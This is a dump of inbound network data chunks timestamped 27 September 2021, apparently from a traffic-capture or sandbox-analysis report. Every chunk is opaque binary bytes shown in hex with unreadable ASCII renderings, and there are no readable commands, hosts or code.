                                                                    2021-09-27 12:27:48 UTC34INData Raw: e5 4e 3a 65 7f a2 4e a2 cd f9 72 c4 1f 35 4c 14 ca 9d f5 88 5c ab 09 cf bb 95 83 4d 87 b1 90 cf de 78 32 3d 37 fb 3f 00 83 3b 52 b6 b3 57 5e b7 0e 9f d2 ef 97 0b 4e ed 6b 00 32 23 94 5c 51 57 5c c5 27 24 5f 5a ae ad ed 9e b5 79 30 dd 94 32 a6 41 7a 1e 3a af d8 8a 6c 40 1c 35 03 a2 4e 89 d8 b6 78 ed 5c a0 3a 87 92 ca ba 77 79 3d e1 08 e6 c1 49 79 24 ae d0 00 10 f0 47 d2 19 b3 3b 59 e0 88 23 ac 56 92 f9 28 4b fc f3 d8 b4 52 5c ef 4d 91 83 a5 38 7c 2c 02 b5 d2 bf 27 9c fb 8e 57 be c8 f9 6d e9 90 68 b7 99 7d 7c f4 f1 0a a5 62 d1 5f 3f 78 17 00 40 34 ac 31 86 9f bd b5 e3 86 19 0a 7f 54 97 cc 4d 85 c4 75 3a 63 3a fe 7e 9c d9 f2 50 3d cd 91 c0 c1 ab ab e3 20 4a 50 73 4c f2 bc 34 06 c4 2f b1 53 ec a1 51 d0 3b 8a 4e f5 d3 bc 03 42 99 39 4a 01 f0 56 4f 10 e0 6f 94
                                                                    Data Ascii: N:eNr5L\Mx2=7?;RW^Nk2#\QW\'$_Zy02Az:l@5Nx\:wy=Iy$G;Y#V(KR\M8|,'Wmh}|b_?x@41TMu:c:~P= JPsL4/SQ;NB9JVOo
                                                                    2021-09-27 12:27:48 UTC35INData Raw: 4e 29 20 fd 5a 94 f2 f6 4f cf 83 32 c1 ce 29 19 d4 b3 20 17 ca b1 2d 1d 52 f7 a7 02 48 5e 69 7a ce 53 72 c4 20 02 b0 6d ec 1f 81 68 9d 7f 32 67 31 c9 53 e7 79 ca d4 4d 74 8b 0f 75 09 87 bf e4 41 9e a3 45 f0 fc 77 68 4e 7d 06 7d 35 5e fa 20 68 e1 14 49 cd 67 65 84 9c e1 46 4d da b5 11 c2 55 22 32 56 d3 cd 9e e9 46 26 e7 bd 75 9d 37 7d e7 02 18 ce f4 56 24 98 57 ce ff 78 83 1b 0f 6d c4 bf ef 47 23 30 05 a1 61 3c 69 87 eb 6a 3f 4e 68 3b 1a 64 e8 63 08 65 ef ec f0 db ec 28 fb e3 c2 06 fc 7e 1b a9 d0 fc e1 f1 52 5f 9b fe 88 ac 20 a3 f9 eb 3e 8e ca 8a 61 26 7c 0a 8e 13 8b 51 53 16 2b cb 59 f4 70 0f 67 df 18 60 10 54 bd 81 f9 b4 4c a7 86 ce 0a 1a 4b b4 74 a0 5e ee b5 23 f3 49 d1 c9 13 44 73 6e f8 15 fa 87 91 26 11 96 48 5b e1 23 0e 2d cb ad 67 6c 1a 07 8d a9 48
                                                                    Data Ascii: N) ZO2) -RH^izSr mh2g1SyMtuAEwhN}}5^ hIgeFMU"2VF&u7}V$WxmG#0a<ij?Nh;dce(~R_ >a&|QS+Ypg`TLKt^#IDsn&H[#-glH
                                                                    2021-09-27 12:27:48 UTC36INData Raw: 01 70 5f 75 27 9c ac 92 59 27 1f e1 37 72 80 58 9a 38 b3 8f 5f 80 ca ac 0b bd ef 8a 03 6e 5b 63 a0 73 3a c9 b2 68 0f 14 4f 68 03 97 8b 9f 7e fd 28 72 c9 ec 21 c4 f5 60 16 ec aa 70 2a ef 2e 06 c9 5e 91 83 63 17 49 6d c2 f3 60 bf 8c 8e c5 06 0c b4 4a 52 a4 17 da 50 6e 7a f4 11 cc 5a aa fd ac e9 e7 04 70 fa 33 2e ed 61 ab 8e a1 17 d8 f5 d4 b2 fc fb 0b 82 e1 5a 27 4c 3d fd a4 5d 08 47 7d 49 e9 54 28 c6 30 b8 84 b5 00 3a d6 ee 1a 21 a0 f6 04 29 7f 5d ff de 9c 87 36 32 90 6c 10 60 7f 2a d4 74 23 ff 89 cd 25 72 77 ee e3 00 d9 fa 49 7b 6b 45 95 2c 73 52 33 8a e6 66 17 98 1a 4e e0 d8 f6 89 53 e8 48 b9 d8 c6 f7 29 12 26 5c 3c d4 4b 3d f1 3a 42 0f 50 4f 4c 25 56 98 0e 37 a4 f9 3e 16 99 82 77 ee b9 d0 72 d4 e7 10 b1 3e e4 90 69 7b 0c db 2f a1 a2 55 b8 f0 09 00 a3 88
                                                                    Data Ascii: p_u'Y'7rX8_n[cs:hOh~(r!`p*.^cIm`JRPnzZp3.aZ'L=]G}IT(0:!)]62l`*t#%rwI{kE,sR3fNSH)&\<K=:BPOL%V7>wr>i{/U
                                                                    2021-09-27 12:27:48 UTC38INData Raw: 20 05 41 fb 63 39 65 2a a4 66 81 e6 46 75 ec 3e 3e 4b 00 db 66 f5 88 52 90 20 dc bd 82 ac 75 94 b6 18 17 76 d0 32 3b 3a 91 37 6e fe 3f 26 f1 a7 44 56 ac d8 fa 87 c3 91 06 32 b3 7a 09 57 ab 92 76 5b 44 52 c4 28 57 08 5a a8 a7 da b9 a4 7e 5f 8b 94 32 b7 62 70 c0 04 88 f0 bd 38 40 16 37 3b f7 44 a5 d4 ad 02 b4 a5 a0 30 86 81 f1 f6 5c 41 3b c9 bb 3a d4 5b 42 0f 72 0e 05 1d 9e 73 d2 1f 91 0c 48 c8 ba 4c 96 5d 4c f3 05 63 bb f0 99 d6 7a e5 ef 4d 97 ab 16 38 7c 26 4e fd d1 bf d5 b4 df 8e 41 b4 a7 c3 6c e9 9a 6f 9f d0 7e 7c 76 d8 b3 a7 44 d7 77 1c d2 16 0a 68 63 af 31 80 ad 99 b5 e2 8e 76 30 7e d0 9c cb 65 8d c7 75 3c 8c 82 fc 7e 9e f1 d1 50 3d c7 b9 8c c2 ab ad cb 04 4a 50 79 ee c9 bd 34 c1 c2 07 fc 5f ec a7 79 73 39 8a 49 e7 f2 94 14 48 b1 7d 4b 02 99 01 6b 10
                                                                    Data Ascii: Ac9e*fFu>>KfR uv2;:7n?&DV2zWv[DR(WZ~_2bp8@7;D0\A;:[BrsHL]LczM8|&NAlo~|vDwhc1v0~eu<~P=JPy4_ys9IH}Kk
                                                                    2021-09-27 12:27:48 UTC39INData Raw: b4 53 12 60 22 fe ed 24 5d 9d 92 44 d5 9a 3e ae ba 2d 06 d7 91 ff 31 ca 8c 2f 1d a7 ac b8 08 51 87 61 6c a4 5a 79 3a 2b 04 a1 64 d8 7f 82 6a 9b 5b af 7d 54 c3 71 84 66 c1 c7 4a 74 94 0a 09 82 86 99 ef 43 b6 8c 5e c0 f2 5b 74 52 6e 03 30 24 5b fc ca 62 be 76 50 de 68 69 e6 fb fd b8 46 fb b9 0f cb 24 a9 37 56 c8 a7 a3 e6 b8 2d d8 bd 2d f7 29 72 fe 14 1d ce f4 5d dc f6 5c db f9 70 ba 00 14 02 eb 96 cb 4d 32 3f 72 02 4b 3d 63 96 fb 47 59 5e 6d 2e 05 9e f8 4a 6f 47 f9 3a f7 d7 e6 2a f9 f2 d7 15 fb 84 94 32 bc c7 f3 f4 58 45 40 fb 89 57 4e eb fa c0 31 bf 1b 11 9f d9 70 b9 83 19 82 77 7f 01 46 b4 42 c4 7e d3 87 d9 77 76 49 54 b7 ba fb 9c f5 a6 9a c8 01 6b f1 f1 74 b0 0b e9 d4 f0 f3 49 db d8 1d 5c 60 02 af ab f1 87 91 37 1f e5 47 c3 97 60 26 1c cf ae 45 26 1e 3f
                                                                    Data Ascii: S`"$]D>-1/QalZy:+dj[}TqfJtC^[tRn0$[bvPhiF$7V--)r]\pM2?rK=cGY^m.JoG:*2XE@WN1pwFB~wvITktI\`7G`&E&?
                                                                    2021-09-27 12:27:48 UTC40INData Raw: 63 d1 75 f2 aa 5f 6e 2b 06 84 e4 43 17 11 ed 18 70 a8 20 bb 38 b9 b6 4d ad c3 a4 72 5c 7a 8a 09 7e 40 71 b5 59 18 23 e7 68 05 38 0a 12 56 9d 89 f4 98 8f 29 78 d7 d2 70 57 f4 6a 30 81 62 68 2c f2 f2 d2 c1 69 ac b2 cf c3 53 42 c2 fc 60 bf 8c 5b ed 38 26 b4 40 8c a5 2d da 51 7e 7a fa 11 d3 77 aa ab ee e9 e9 1f 63 ca 31 84 b8 1b fe 8e fa 13 a6 96 c3 a1 f3 eb 2c 82 e1 50 0a 4c 3a 99 fb a3 09 6f 41 34 c0 34 21 ee a1 d7 19 b3 26 32 c7 27 1b 21 aa c3 69 25 66 75 55 db 8b 73 b7 7e 93 74 07 7a 65 13 6a 68 dd f4 25 a7 27 5a f9 c5 fd 08 e2 ed 64 6b 6e f1 84 29 6c 08 cd 8b db 65 1d a8 94 24 e3 d8 f0 a9 6e 16 49 9f ac 74 96 29 18 3d 78 31 d2 4b 2a 8a 47 4c f1 55 4b 62 1d b0 92 8e 54 bb f6 29 09 95 93 7a eb b9 d0 72 d4 9b 5b 9e 3e e0 8d 78 6b 0d db 25 a2 b8 5c b8 e9 16
                                                                    Data Ascii: cu_n+Cp 8Mr\z~@qY#h8V)xpWj0bh,iSB`[8&@-Q~zwc1,PL:oA44!&2'!i%fuUs~tzejh%'Zdkn)le$nIt)=x1K*GLUKbT)zr[>xk%\
                                                                    2021-09-27 12:27:48 UTC41INData Raw: ad 41 3e 11 00 4b dc 4a 11 11 7a a4 60 ff 56 f8 74 e6 29 3f 5e 37 8d 70 f6 88 50 90 99 df bd 8e 95 72 be c0 1d 78 b7 be aa 3c 3d e0 28 65 ec 12 7a cb a4 44 51 8e 91 f1 80 e5 86 28 75 9c 79 09 5b 18 0c 5d 5b 4e 42 de 3a 7e 22 23 ad a7 f8 bb 33 75 5f 81 85 1b 84 28 77 c0 0e e5 68 bc 6c 4a 07 2c 01 9a 6f de d1 a7 77 aa 33 a1 3a 87 97 f0 9b 23 42 3d e7 6d a0 d5 5d 60 3d 78 1c 26 1d a5 73 d2 1f 91 bf 49 c8 ba 32 85 74 32 fa 02 4d 93 6b 98 d0 58 4d e7 5f b8 ab 4a 3b 7c 2a 4e 22 d3 bf d9 8d d2 9a 2e 26 c9 f9 67 ff 81 60 a0 43 6e 56 63 fb 32 d3 47 d1 5f 37 02 5c 00 40 28 84 25 86 85 b7 9d 96 85 19 00 57 c1 96 cc 47 d5 ca 67 37 b5 35 91 6b 98 d9 f8 78 aa cc 91 ca d3 a9 83 7a 21 4a 5a a3 cb f3 bc 35 e3 d1 2f b1 56 c4 a1 50 ca 31 e0 99 e7 d2 95 14 48 95 4d 3a 03 9f
                                                                    Data Ascii: A>KJz`Vt)?^7pPrx<=(ezDQ(uy[][NB:~"#3u_(whlJ,ow3:#B=m]`=x&sI2t2MkXM_J;|*N".&g`CnVc2G_7\@(%WGg75kxz!JZ5/VP1HM:
                                                                    2021-09-27 12:27:48 UTC43INData Raw: 11 12 c4 a4 46 30 44 33 f4 fa b5 90 b1 97 65 07 97 28 a4 ab 39 13 c1 62 00 1c ef 94 13 72 3f a0 a7 1d 4c 91 6b 7d b0 4f 64 3a 2b 04 b3 74 e3 15 81 7b 97 2b 21 83 55 e5 54 df 30 c8 d4 4f 6b 91 1c 18 7c 96 bf fb 51 60 a2 72 d1 fe 5f 4c 4f 7d 0c bc 8e 5e eb 35 70 97 6a 59 de 67 69 e6 f4 ff 48 b9 d6 90 08 c0 12 1f 33 56 d3 2e 07 e8 46 2d e7 be 19 b4 25 77 ed 00 17 c7 0f 46 0e ee 72 1f b4 72 92 1c 3f 16 ed be e5 65 46 34 1d c4 63 2c 69 8d e2 4e 40 5c 62 31 18 6a e2 98 66 62 fa e3 fa e0 72 38 fc f8 d9 00 87 ac bd 1d be d0 ea fb 44 47 4f e4 88 a3 50 da 06 ea 18 8e 9d 29 61 26 76 c9 4e 0a 88 7d 44 15 5e 62 58 d8 6c da 67 f0 66 76 11 5e d8 0a f8 b4 46 8e 8b ce 0a 12 58 f5 6f a9 0b ee aa 29 ef b7 d0 e7 50 5b 77 27 cd 15 f0 8d d4 2b 11 f4 4a ee 9a 69 0e 17 30 51 b0
                                                                    Data Ascii: F0D3e(9br?Lk}Od:+t{+!UT0Ok|Q`r_LO}^5pjYgiH3V.F-%wFrr?eF4c,iN@\b1jfbr8DGOP)a&vN}D^bXlgfv^FXo)P[w'+Ji0Q
                                                                    2021-09-27 12:27:48 UTC44INData Raw: 56 92 c3 72 80 1a ff 70 5f 79 26 dc 97 f5 4b 2e 2d 2a 25 70 a8 31 9c 29 b0 8f 2e 82 ca a0 72 1f 7b 8a 05 7b 79 62 a6 62 39 9c 85 6b 0f 16 22 99 57 97 8d 88 0b 9e 2f 66 3d c5 49 c3 8b f9 3a ee 7e 7f 04 d6 f8 0c c5 57 65 b3 af e5 62 59 ef e8 41 97 c1 84 ed 34 1d b3 51 85 8c 5e d9 51 78 15 7e 10 cc 5c c5 3d f4 e9 e3 0f 75 d2 85 84 ef 1c ed 88 b0 19 8e 08 d4 b2 fc fe 27 92 ea 78 85 5c 3f 8c dc 67 19 45 79 0a 9b 76 20 ee a1 ab 88 a2 2a 29 f4 fb 33 23 aa da 73 3a 72 7e 2b fa 9e 8d b0 43 9c 7d 12 10 43 00 6f 72 32 f9 21 23 26 72 75 ab d7 00 f1 ef 7f 69 67 9e 8d 2d 73 09 1b a4 f5 70 1d b3 ba 90 ef fd de b6 4a 16 43 86 ce 90 ae 29 12 28 aa 22 c6 42 2c 59 4b 4b 1e 5d 76 7b 1b 66 6d 71 ab b5 f7 2d da 86 8c 6e fe 56 de d0 6d a6 db 4f c1 1f 81 6b 07 0d db 24 a2 ab 59
                                                                    Data Ascii: Vrp_y&K.-*%p1).r{{ybb9k"W/f=I:~WebYA4Q^Qx~\=u'x\?gEyv *)3#s:r~+C}Cor2!#&ruig-spJC)("B,YKK]v{fmq-nVmOk$Y
                                                                    2021-09-27 12:27:48 UTC45INData Raw: e5 46 b5 a1 b7 a9 01 0c 56 1b 70 35 74 75 b5 75 ae 32 07 8b 13 29 24 5b c8 b6 14 e4 99 47 aa 80 69 82 e2 7a a4 69 b0 34 78 b1 d1 33 21 3d ea 39 6f 60 3b 59 15 a7 56 4d a6 06 f1 80 ef ba 00 9a 10 7b 06 47 77 94 5d 48 74 55 d4 b6 57 0a 5a 9b a7 fe 82 b2 67 5b b3 1b 32 ac 52 74 d1 0c 96 0e bc 40 47 1e 31 c5 bf 5a b6 d6 a7 60 86 b9 5e 3b a1 81 d1 ba 6e 77 23 f2 06 38 c5 59 72 d2 73 22 1f 37 56 c7 c5 c3 ae fe c5 e3 b0 23 ad 56 55 ea 06 4b ed f7 80 2e 53 70 e6 5b 93 0d 82 2f a6 21 6a af c1 bb d3 8d ff 95 bf bf e4 e8 6b e1 92 60 26 9a 75 7f fe 47 57 34 25 4d 43 2c d6 16 11 44 33 52 30 aa 80 96 1e f9 97 1d 0a 6e d4 81 32 4c ea c7 6d 29 a0 3b ef 7a 8e 27 f3 7c 3e da 82 c4 c1 ba af fd de 4b 7c 71 aa f6 84 58 34 3a d0 b7 76 ec a1 4a fa 3e 8a 68 cd d1 94 72 42 99 22
                                                                    Data Ascii: FVp5tuu2)$[Gizi4x3!=9o`;YVM{Gw]HtUWZg[2Rt@G1Z`^;nw#8Yrs"7V#VUK.Sp[/!jk`&uGW4%MC,D3R0n2Lm);z'|>K|qX4:vJ>hrB"
                                                                    2021-09-27 12:27:48 UTC47INData Raw: a2 94 ce 0d 5e db ba 4f 3a 44 23 e5 d7 48 91 c1 92 4e cf d7 3b ae ba 5b a3 de 6f f4 17 c5 e3 04 15 3d a4 8f 15 40 82 67 55 f8 46 73 c2 02 30 b2 6c f6 70 47 6a 9d 3e ec 73 71 e1 6a e7 79 c0 d8 67 4c 85 0f 18 a2 87 b3 9a 6e 9f a3 5a e8 ef 75 e9 48 55 5f 33 35 58 c3 2d 61 92 73 27 0b 6d 69 fd 20 ee 63 6f e0 bc 19 cc 37 92 0a 56 d9 a8 62 e8 40 06 f5 a7 06 bb 36 7d eb 11 01 fd f1 49 38 f7 70 ce ff 72 a2 1e 0b 4e ed b0 f5 4d 32 34 06 fe 48 3d 35 8d e8 42 07 4f 68 20 7a da f9 66 6d 44 e8 92 ca c9 eb 3d d4 e5 c4 10 eb 52 ce 1d bf d6 c8 e9 5a 54 43 8b 5f a9 4f cd 26 e5 11 af 92 ef 60 2c 7a fe 68 19 82 77 8b 1f 42 e2 69 f5 7a d7 47 cf 75 76 17 7c ec a8 f9 b2 64 bf 98 ce 0c 77 8d f1 74 b0 df e0 9e 0b c4 49 d1 c1 1e 62 4b 0f 97 1f 2e 87 97 0c 10 e8 4a 59 9a 69 08 2d
                                                                    Data Ascii: ^O:D#HN;[o=@gUFs0lpGj>sqjygLnZuHU_35X-as'mi co7Vb@6}I8prNM24H=5BOh zfmD=RZTC_O&`,zhwBizGuv|dwtIbK.JYi-
                                                                    2021-09-27 12:27:48 UTC48INData Raw: 45 7f 53 44 94 df 0c 00 74 77 7b 48 10 b9 07 84 ef 37 ae 14 ed 2f 63 ad 08 35 3b b9 a1 3c 05 cb a6 17 9d 6b 8f 2b f3 73 73 ab 5b 9f b7 e7 6e 27 8b 4d 13 5c bf 17 9b 00 85 01 e7 c3 c4 52 aa 40 6b 3a e4 1b ee 2d f8 f2 1b a0 c9 9a b2 c5 a6 ce 49 ea ce 73 bb 8e 94 e8 16 97 b4 40 86 8c 97 d9 51 78 52 6f 11 cc 50 82 39 f4 e9 e3 15 77 d2 03 84 ef 10 c7 58 a1 13 a6 80 a6 3f f7 d3 62 90 ef 8e 1e 78 17 b1 f1 5d 02 50 5a 3a e5 7c 1a ee a7 b2 59 09 26 38 fe 85 15 09 01 df 62 30 0c f2 45 de 9a a0 b4 54 ba 7a 05 71 0a 8a 6e 74 25 e2 d3 bf 32 61 63 fc 71 02 f1 e9 68 76 7a e1 82 43 fa 02 33 8c e4 61 0a ae ad 5e fa b7 7f 80 4a 10 5a 86 d2 b6 87 39 0b 4d fd 23 d7 4d 28 9d 49 53 27 db 66 6b 2f 7b da 9f 47 8c 76 3b 0c 9f af 40 e1 55 f9 d1 db 99 79 9c 08 93 a5 43 07 0b c8 31
                                                                    Data Ascii: ESDtw{H7/c5;<k+ss[n'M\R@k:-Is@QxRoP9wX?bx]PZ:|Y&8b0ETzqnt%2acqhvzC3a^JZ9M#M(IS'fk/{Gv;@UyC1
                                                                    2021-09-27 12:27:48 UTC49INData Raw: 1d 1a 91 41 57 b3 b5 7f 35 01 06 5e c4 75 a5 74 7f bb 6c 86 52 e8 72 f3 33 23 d0 0f a3 1a f9 9e ca a9 08 c1 b0 92 18 4a 90 a9 10 6e 2d c0 34 22 32 fc a5 7e f8 30 21 91 a6 44 5d ab 0f e7 ef c5 96 01 57 ed 6d 66 74 76 94 56 52 47 54 bb ef 56 0a 50 a2 8f 69 93 a4 7e 57 9f bc 8f af 52 72 d9 85 8d f0 bd 6d 53 11 37 14 a5 45 07 c3 a0 66 94 28 9f 3a 8d 87 7b a2 58 59 3f 6f b5 b4 eb 5d 6a 2d d0 1f 08 26 d0 61 da 0d ad 31 c5 e7 b0 23 ad 4f 45 e8 0b 5d eb 6f 88 d9 45 4a 71 5c 98 9b 23 a4 6d 25 4e 16 d2 bf d9 8d f2 98 d1 92 e9 e8 65 ff 0a 40 a6 99 7d 76 a0 e2 0a a5 5f f9 4b 3f d2 1c 28 74 28 ac 3b f2 97 bd b5 f9 7a 12 0a 7f a4 84 cc 4d dd ab 63 3b a4 31 ed 7a 89 dd e6 78 83 ce 91 c6 d6 26 ac e3 20 4b 43 7b 90 fb aa 2b db 49 10 b1 5c ed 03 40 c2 2f 9e 5b e7 72 94 14
                                                                    Data Ascii: AW5^utlRr3#Jn-4"2~0!D]WmftvVRGTVPi~WRrmS7Ef(:{XY?o]j-&a1#OE]oEJq\#m%Ne@}v_K?(t(;zMc;1zx& KC{+I\@/[r
                                                                    2021-09-27 12:27:48 UTC50INData Raw: bc 10 54 bd 83 32 b5 4c ac f5 02 0b 18 41 e2 72 b3 29 72 bb 23 f9 61 c7 c9 13 4c 60 08 86 12 dd 80 97 2d cc 9d 48 59 9a 7f 1f 2b d8 74 5c 19 08 0c bf e4 44 b5 ab 78 a1 38 c2 42 cd 65 11 a4 7a a4 60 81 c5 d1 89 ec 38 33 5b 93 fa 05 f5 89 45 ab 1f cd ab 9b 89 c6 87 a5 71 31 b0 d1 38 2e 31 fb 35 79 64 37 43 b0 b0 de 44 a3 75 06 81 ef 91 12 54 f5 73 18 51 6d 0e 74 3d 45 53 de 47 a0 0b 5a a8 b4 f3 82 a9 60 77 48 97 32 aa 45 f9 c7 08 8a f1 ae 78 51 02 30 05 3f 78 a5 d2 a6 d3 93 b0 b4 2e 99 ae 7a b3 5f 4b 29 c9 c1 3b d4 5b 7d a1 75 0e 0f 34 cb 65 c3 0c af 3f c4 f7 b0 23 ad fe 5d ec 16 5f e8 db 3a d0 52 56 f9 65 52 80 35 3e 6b a1 61 b5 d2 be c0 8a ea 98 57 a9 44 c6 6d e9 91 ca a6 8f 69 68 64 d8 a9 a5 44 db 4b 17 16 15 00 46 3f 21 36 86 85 bc a1 f6 90 31 a9 7f d0
                                                                    Data Ascii: T2LAr)r#aL`-HY+t\Dx8Bez`83[Eq18.15yd7CDuTsQmt=ESGZ`wH2ExQ0?x.z_K);[}u4e?#]_:RVeR5>kaWDmihdDKF?!61
                                                                    2021-09-27 12:27:48 UTC51INData Raw: 21 14 35 a2 28 c8 41 28 8a 58 53 0a 48 99 6a 09 5a 94 8c 3b 6d f9 3a 06 a7 89 62 e3 42 d1 4f df 87 8d b0 12 d2 8f 43 0e 17 b4 ca be ab 53 a7 e8 3b d1 a3 a4 c4 12 14 cc db ba 3a 44 28 d6 32 4a 91 97 f3 66 1c 88 3b a4 83 fc 18 de 65 d6 39 c3 9d 21 18 22 a9 b4 07 42 93 64 62 ab bb 72 e8 22 21 aa ba fd 00 8a 79 98 34 23 78 49 37 5c cb 7c dc de 51 67 80 0f 03 79 9d 4b e5 6d 91 b5 5c af 31 77 e9 44 6a dc 23 31 53 f0 27 66 92 64 4d d2 66 97 f6 d2 ec 4f 56 d3 82 6d 39 c5 45 2d 5a ca a7 bc f9 43 3b 0a ba 2a b8 2e 6e e8 11 0c da e9 b9 23 db 79 e7 d1 70 92 18 1b 1b fe bb ef 5c 37 23 e3 cf 67 3e 7e 9e ed 42 48 4a 77 3d f7 61 d5 64 4c 4b d6 ef 05 37 14 31 d6 f2 d5 20 e9 7a 74 1f bf d0 8f f1 58 45 53 f7 93 91 82 c6 f8 eb 34 96 af f0 69 d8 77 fa 59 21 ee 7c 55 1f 5b 96
                                                                    Data Ascii: !5(A(XSHjZ;m:bBOCS;:D(2Jf;e9!"Bdbr"!y4#xI7\|QgyKm\1wDj#1S'fdMfOVm9E-ZC;*.n#yp\7#g>~BHJw=adLK71 ztXES4iwY!|U[
                                                                    2021-09-27 12:27:48 UTC52INData Raw: c5 75 30 d0 29 fe 7e 83 ca fa 42 35 dc 99 4e 76 bc 71 cb 26 4a 50 58 90 f4 ad 3c e3 25 2f b1 5a ff a8 22 e8 39 8a 49 dc db 85 1e 53 9c 1b 96 02 9f 2f 20 38 e4 45 92 c4 69 96 7e 18 55 5d 7f 37 17 8e f4 51 48 33 ef 25 76 b9 2a b3 e5 ba a7 49 ee e0 a4 1d 93 a4 86 2b 5f 73 73 ab 5b 08 b4 e7 62 d1 10 5c 1e 41 41 98 96 11 82 38 7c 4d 73 67 f6 0a 95 c5 30 61 4c 04 cf f8 0c c5 52 97 c1 75 c9 47 42 e1 ec 58 bf 86 8f 33 3c 0a 9e 47 a6 e5 71 da 51 7e 7a f4 11 ca 5a aa a5 ef e9 e9 1e 51 fa 32 84 fb 1a fe 8e bb 13 a6 86 d5 b2 f6 d3 3b 83 e1 50 a3 5d 3f 86 f9 5c 08 43 59 3c e8 54 38 ee a7 b9 84 b3 26 38 f8 94 1b 21 8b dd 62 36 44 74 44 de 89 8d b6 52 8a 6c 14 7e 76 32 6c 74 03 f4 09 ac 57 72 73 d5 eb 11 f6 d1 86 78 6b f1 95 3d 74 1d cd 8b db 79 23 5d bc 4e e0 c7 ff 92
                                                                    Data Ascii: u0)~B5Nvq&JPX<%/Z"9IS/ 8Ei~U]7QH3%v*I+_ss[b\AA8|Msg0aLRuGBX3<GqQ~zZQ2;P]?\CY<T8&8!b6DtDRl~v2ltWrsxk=ty#]N
                                                                    2021-09-27 12:27:48 UTC54INData Raw: 6f d8 77 20 11 54 b7 e1 f8 b4 4c 06 9b ce 0a 0e 4b f1 74 ba 01 ee bb 23 f3 49 d1 cd 13 4a 73 cc 96 15 f0 4e 90 26 11 e1 4a 59 9a 73 0e 2d ce b5 7f 0e 1b 6f 86 dd 46 c0 ab 69 b8 63 ba 41 cd 69 33 4d 97 a7 66 96 c2 87 48 ec 38 3f 44 71 15 04 f5 82 5b b1 61 6f bc 84 8e 48 9a a0 0d 73 89 c4 33 3d 3d fb 35 7e f5 a1 41 b8 ae 55 53 c9 b6 f1 80 e5 84 04 4c e1 57 0c 80 82 94 5c 5b 55 56 fc c7 54 0a 5c c1 15 ff 93 ae 5c c3 8b 94 38 bf 54 65 c6 20 05 f1 bd 66 6c 13 fb c7 b3 47 a5 c3 a2 59 72 a7 a0 3c e2 34 d8 b3 55 69 a1 e1 02 32 c7 57 7b 26 63 0b 27 a2 db 70 d4 76 0b 29 48 c2 98 bf ac 5c 46 e8 04 63 8f f2 99 d6 41 5b fc 48 b9 72 36 38 7a 43 d4 b4 d2 b5 fb 00 fb 8e 4b ad c0 e8 6b c1 75 6b b7 9f 6c 79 58 02 09 a5 42 f9 ac 3c d2 10 6f 9f 28 ac 3b ae b6 bc b5 e8 ac 2a
                                                                    Data Ascii: ow TLKt#IJsN&JYs-oFicAi3MfH8?Dq[aoHs3==5~AUSLW\[UVT\\8Te flGYr<4Ui2W{&c'pv)H\FcA[Hr68zCKkuklyXB<o(;*
                                                                    2021-09-27 12:27:48 UTC55INData Raw: d0 b0 89 08 01 30 74 33 c5 54 2e 71 59 6e 16 45 6d 7d bf 7e 05 8d 54 a2 ef 12 22 95 82 75 e6 07 68 5f da 99 6c a7 2d f2 87 50 15 12 c8 db bf 87 50 a9 f2 04 64 ae bb da 02 00 db a5 47 27 ba 23 d2 ec 5a 95 b5 2f 4f cf 83 36 b0 b8 3a 19 cf 7d e1 12 3d 9c 07 1d 05 d9 59 fd bd 9d 71 6e b3 45 62 d6 35 09 4e 6d dc 13 90 62 95 5b 1a 7f 54 cf 42 c5 6a d8 d4 5e 66 9a 06 ec 7d ab b2 f2 52 93 bc 54 d3 ea 77 f8 5c 62 22 ce 34 72 fb 25 6b ba 77 4c cd 6b 06 dd fc e0 40 58 f2 af 0b c6 2b a8 2d 44 27 a3 90 f1 57 26 e2 21 2e bb 32 7d eb 07 35 f1 f1 47 28 e1 30 9b 00 8d 6d 01 04 11 ff be fe 5f 2a cb 1c e2 52 15 74 8e e8 44 71 6c 68 31 03 48 06 65 67 48 c6 c8 fa c8 e1 2a f8 eb d5 02 ed 6b 87 01 a1 2e e1 dd 52 45 55 f3 4f ba 5f d8 e7 f8 26 87 b4 fd 7f 00 88 d7 7c 13 93 70 42
                                                                    Data Ascii: 0t3T.qYnEm}~T"uh_l-PPdG'#Z/O6:}=YqnEb5Nmb[TBj^f}RTw\b"4r%kwLk@X+-D'W&!.2}5G(0m_*RtDqlh1HegH*k.REUO_&|pB
                                                                    2021-09-27 12:27:48 UTC56INData Raw: df 44 d7 cd 64 29 9a 98 03 81 67 07 e7 75 15 fa 91 c0 cb b8 b9 90 9a 4a 50 79 8c db 84 34 cb cf f1 b3 5a c6 a8 7b ca 7a 96 4f cf d1 94 14 42 b8 33 48 02 5a 2b 4f 10 00 47 94 d5 76 87 75 77 6b 5f 7f 30 1d b4 e2 58 a4 17 ed 25 0a a8 20 8a 4b 03 a7 4f 8b c0 8e 46 95 7a 8c 6c 8c 72 73 ab 60 34 ca db 68 0f 1a 40 3b 78 95 8b 9d 0c f1 15 72 c3 ce 70 c8 f1 6a 3c 81 c4 68 2c f2 f5 05 a0 f0 9a b2 c5 da 42 41 85 fb 60 bf 8c 94 e8 2d 1a a2 53 99 9c 28 d8 51 7e 6b e2 00 d9 c0 b9 aa dc e7 ed 1e 76 eb 3d ac cb 1a fe 84 89 1c a2 87 d3 9a d8 d1 64 85 c9 b5 0b 5d 35 ae 6d 5d 08 49 46 30 f9 58 4d 0a a6 b8 8e a0 21 29 f2 fb d2 21 aa d6 0e 15 63 75 44 de 9c 8d a6 12 cb 44 85 7f 65 08 d8 63 f5 78 1c ac 25 73 60 c9 d6 44 e0 f9 68 7f 7c d9 73 2d 73 09 29 50 d8 5c 0a ad ad 45 f1
                                                                    Data Ascii: Dd)guJPy4Z{zOB3HZ+OGvuwk_0X% KOFzlrs`4h@;xrpj<h,BA`-S(Q~kv=d]5m]IF0XM!)!cuDDecx%s`Dh|s-s)P\E
